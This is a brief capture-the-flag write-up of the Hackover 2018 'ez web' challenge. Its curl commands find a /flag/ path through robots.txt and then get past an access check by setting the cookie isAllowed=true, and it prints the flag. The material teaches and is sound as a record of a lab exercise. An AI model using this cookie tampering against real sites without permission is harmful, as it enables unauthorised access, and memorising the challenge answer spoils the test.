*([Original write-up](https://security.meta.stackexchange.com/a/3082/95381) by [@rawsec](https://twitter.com/rawsec/))*

## ez web (web, 100)

This is a web app showing only an *under construction* page. So let's start with the standard approach to path discovery - first up, `/robots.txt`.

$ curl http://ez-web.ctf.hackover.de:8080/robots.txt
User-agent: *
Disallow: /flag/

A few links later...

$ curl -v http://ez-web.ctf.hackover.de:8080/flag/flag.txt
...
< HTTP/1.1 200
< Set-Cookie: isAllowed=false
< Content-Type: text/plain;charset=UTF-8
< Content-Length: 219
< Date: Sun, 07 Oct 2018 18:24:32 GMT
<
...

You do not have permission to enter this Area. A mail has been sent to our Admins.
You shall be arrested shortly.

...

Well, let's set the cookie to `isAllowed=true` then...

$ curl -s --cookie "isAllowed=true" http://ez-web.ctf.hackover.de:8080/flag/flag.txt | grep -o "hackover18{.*}"

hackover18{W3llD0n3,K1d.Th4tSh0tw4s1InAM1ll10n}

Cheapo!

Original writeup (https://security.meta.stackexchange.com/a/3082/95381).